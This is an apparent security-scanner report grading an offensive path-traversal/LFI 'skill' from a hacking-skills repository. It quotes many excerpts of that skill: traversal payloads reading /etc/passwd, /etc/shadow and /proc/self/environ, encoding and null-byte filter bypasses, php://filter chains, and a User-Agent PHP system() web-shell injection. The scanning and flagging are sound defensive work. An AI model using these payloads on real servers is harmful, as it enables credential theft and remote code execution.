path-traversal-lfi
github.com/yaklang/hack-skills
Scanned Thu, 28 May 2026 17:25:31 GMT
Scan ID crawl-y382u320qy74vqno1wir3yah · 5ms
C
SCORE 55 / 100
Verdict: Proceed with caution
27 high-severity findings.
This skill reads protected filesystem locations; 27 other issues are listed below.
0 critical · 27 high · 1 medium · 16 rules passed
Why grade C?
score · 55 / 100
The current grade reflects 27 high-severity findings (3+ HIGHs → C).
0 CRIT · 27 HIGH · 1 MED · 0 LOW
To reach a higher grade
- Reach B (target score 75): resolve 25 of 27 HIGH (cap is 2).
- Reach A (target score 95): resolve all 27 HIGH.
Thresholds are documented at /docs/grading. The source of truth is the grade() function in @skillox/scanner.
Findings · ordered by severity
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
19
20  ```text
21  ../etc/passwd    ← sensitive path — credential-exfiltration vector
22  ../../../../etc/passwd
23  ..%2f..%2f..%2fetc%2fpasswd
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
20  ```text
21  ../etc/passwd
22  ../../../../etc/passwd    ← sensitive path — credential-exfiltration vector
23  ..%2f..%2f..%2fetc%2fpasswd
24  ..%252f..%252f..%252fetc%252fpasswd
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
38
39  Traversal attack:
40  http://target.com/index.php?page=../../../../etc/passwd    ← sensitive path — credential-exfiltration vector
41  → Opens: /etc/passwd
42  ```
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
39  Traversal attack:
40  http://target.com/index.php?page=../../../../etc/passwd
41  → Opens: /etc/passwd    ← sensitive path — credential-exfiltration vector
42  ```
43
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
50  ### Basic
51  ```
52  ../../../etc/passwd    ← sensitive path — credential-exfiltration vector
53  ..\..\..\windows\system32\drivers\etc\hosts (Windows)
54  ```
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
76  ```
77  ..%2F..%2Fetc%2Fpasswd
78  ....//....//etc/passwd ← double-dot with slash (filter strips single ../)    ← sensitive path — credential-exfiltration vector
79  ```
80
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
87  ### Null Byte Injection (legacy PHP < 5.3.4)
88  ```
89  ../../../../etc/passwd%00.jpg ← %00 truncates string, strips .jpg extension    ← sensitive path — credential-exfiltration vector
90  ../../../../etc/passwd%00.php
91  ```
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
88  ```
89  ../../../../etc/passwd%00.jpg ← %00 truncates string, strips .jpg extension
90  ../../../../etc/passwd%00.php    ← sensitive path — credential-exfiltration vector
91  ```
92
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
97  ### Linux
98  ```
99  /etc/passwd ← user list (usernames, UIDs)    ← sensitive path — credential-exfiltration vector
100  /etc/shadow ← password hashes (requires root-level file read)
101  /etc/hosts ← internal hostnames → pivot targets
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
98  ```
99  /etc/passwd ← user list (usernames, UIDs)
100  /etc/shadow ← password hashes (requires root-level file read)    ← sensitive path — credential-exfiltration vector
101  /etc/hosts ← internal hostnames → pivot targets
102  /etc/hostname ← server hostname
Sensitive filesystem path referenced
The skill references a path (`/proc/self/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
101  /etc/hosts ← internal hostnames → pivot targets
102  /etc/hostname ← server hostname
103  /proc/self/environ ← process environment (DB creds, API keys!)    ← sensitive path — credential-exfiltration vector
104  /proc/self/cmdline ← process command line
105  /proc/self/fd/0 ← stdin file descriptor
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
195  ```
196  ?page=php://filter/convert.base64-encode/resource=config.php
197  ?page=php://filter/convert.base64-encode/resource=/etc/passwd    ← sensitive path — credential-exfiltration vector
198  ?page=php://filter/read=string.rot13/resource=config.php
199  ?page=php://filter/convert.iconv.UTF-8.UTF-16LE/resource=config.php
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
203  **Chain filters** (multiple transforms to bypass input filters):
204  ```
205  ?page=php://filter/convert.base64-encode|convert.base64-encode/resource=/etc/passwd    ← sensitive path — credential-exfiltration vector
206  ```
207
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
223  PHP has a historical path length limit. Pad with `.` or `/./` to truncate appended extension:
224  ```
225  ?page=../../../../etc/passwd/./././././././././././............ (255+ chars)    ← sensitive path — credential-exfiltration vector
226  ```
227  When server appends `.php`, the truncation drops it.
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
229  Or null byte if PHP < 5.3.4:
230  ```
231  ?page=../../../../etc/passwd%00    ← sensitive path — credential-exfiltration vector
232  ```
233
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
257  □ Try mixed: ..%2F or ..%5C (backslash on Linux)
258  □ Try redundant sequences: ....// or ..././ (strip once → still ../)
259  □ Try null byte: /../../../etc/passwd%00    ← sensitive path — credential-exfiltration vector
260  □ Try absolute path: /etc/passwd (if no path prefix added)
261  □ Try Windows UNC (Windows server): \\127.0.0.1\C$\Windows\win.ini
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
258  □ Try redundant sequences: ....// or ..././ (strip once → still ../)
259  □ Try null byte: /../../../etc/passwd%00
260  □ Try absolute path: /etc/passwd (if no path prefix added)    ← sensitive path — credential-exfiltration vector
261  □ Try Windows UNC (Windows server): \\127.0.0.1\C$\Windows\win.ini
262  ```
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
268  ```
269  Path traversal (read arbitrary files)
270  ├── Read /etc/passwd → enumerate users    ← sensitive path — credential-exfiltration vector
271  ├── Read /proc/self/environ → find API keys, DB passwords in env
272  ├── Read app config files → find credentials → horizontal movement
Sensitive filesystem path referenced
The skill references a path (`/proc/self/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
269  Path traversal (read arbitrary files)
270  ├── Read /etc/passwd → enumerate users
271  ├── Read /proc/self/environ → find API keys, DB passwords in env    ← sensitive path — credential-exfiltration vector
272  ├── Read app config files → find credentials → horizontal movement
273  ├── Read SSH private keys → direct server login
Sensitive filesystem path referenced
The skill references a path (`/proc/self/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
292  | Log Poisoning (Mail) | LFI + mail log readable | Send email with PHP in subject → include `/var/log/mail.log` |
293  | /proc/self/fd bruteforce | LFI + Linux | Bruteforce `/proc/self/fd/0` through `/proc/self/fd/255` for open file handles containing injected content |
294  | /proc/self/environ | LFI + CGI/FastCGI | Inject PHP in `User-Agent` header → include `/proc/self/environ` |    ← sensitive path — credential-exfiltration vector
295  | iconv CVE-2024-2961 | glibc < 2.39, PHP with `php://filter` | `php://filter/convert.iconv.UTF-8.ISO-2022-CN-EXT/resource=` chain to heap overflow → RCE. Tool: cnext-exploits |
296  | phpinfo() assisted | LFI + phpinfo page accessible | Race condition: upload tmp file via multipart to phpinfo → read tmp path from response → include before cleanup |
Sensitive filesystem path referenced
The skill references a path (`/proc/self/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
417  ```
418
419  ### 2. /proc/self/environ Poisoning    ← sensitive path — credential-exfiltration vector
420  ```
421  # If User-Agent is reflected in process environment:
Sensitive filesystem path referenced
The skill references a path (`/proc/self/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
420  ```
421  # If User-Agent is reflected in process environment:
422  GET /vuln.php?page=/proc/self/environ    ← sensitive path — credential-exfiltration vector
423  User-Agent: <?php system($_GET['c']); ?>
424  ```
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
681
682  ```text
683  GET /%252e%252e/%252e%252e/etc/passwd    ← sensitive path — credential-exfiltration vector
684  ```
685
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
697  ```
698
699  Nginx maps `/assets../etc/passwd` to `/data/../etc/passwd` to `/etc/passwd` because `alias` replaces the exact location prefix (`/assets`) with the alias path (`/data/`), and `../` in the remainder traverses out.    ← sensitive path — credential-exfiltration vector
700
701  ```text
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
700
701  ```text
702  GET /assets../etc/passwd HTTP/1.1    ← sensitive path — credential-exfiltration vector
703  GET /assets..%2f..%2fetc%2fpasswd HTTP/1.1
704  ```
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
741  ```text
742  GET /files/..%2f..%2f..%2fetc%2fpasswd
743  req.params.name = "../../../etc/passwd" (already decoded)    ← sensitive path — credential-exfiltration vector
744  path.join(__dirname, 'uploads', '../../../etc/passwd') = /etc/passwd
745  ```
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
742  GET /files/..%2f..%2f..%2fetc%2fpasswd
743  req.params.name = "../../../etc/passwd" (already decoded)
744  path.join(__dirname, 'uploads', '../../../etc/passwd') = /etc/passwd    ← sensitive path — credential-exfiltration vector
745  ```
746
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest
skillox.io/r/crawl-y382u320qy74vqno1wir3yah